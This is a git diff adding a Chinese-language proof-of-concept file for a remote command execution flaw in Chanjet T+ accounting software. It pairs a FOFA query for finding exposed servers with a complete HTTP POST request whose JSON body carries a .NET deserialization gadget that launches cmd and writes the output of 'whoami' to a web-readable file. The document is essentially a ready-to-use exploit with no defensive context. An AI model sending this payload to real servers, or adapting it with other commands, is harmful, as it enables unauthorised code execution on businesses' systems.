diff --git a/畅捷通TPlus-App_Code.ashx存在远程命令执行漏洞.md b/畅捷通TPlus-App_Code.ashx存在远程命令执行漏洞.md new file mode 100644 index 0000000..77792a7 --- /dev/null +++ b/畅捷通TPlus-App_Code.ashx存在远程命令执行漏洞.md @@ -0,0 +1,36 @@ +## 畅捷通TPlus-App_Code.ashx存在远程命令执行漏洞 + +## fofa +``` +app="畅捷通-TPlus" +``` + +## poc +``` +POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1 +User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) +Accept-Encoding: gzip, deflate +Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 +Connection: close +Host: 127.0.0.1 +X-Ajaxpro-Method: GetStoreWarehouseByStore +Content-Type: application/x-www-form-urlencoded +Content-Length: 570 + +{ + "storeID":{ + "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35", + "MethodName":"Start", + "ObjectInstance":{ + "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089", + "StartInfo":{ + "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089", + "FileName":"cmd", + "Arguments":"/c whoami > test1.txt" + } + } + } +} +``` + +写入文件路径:http://127.0.0.1/tplus/test1.txt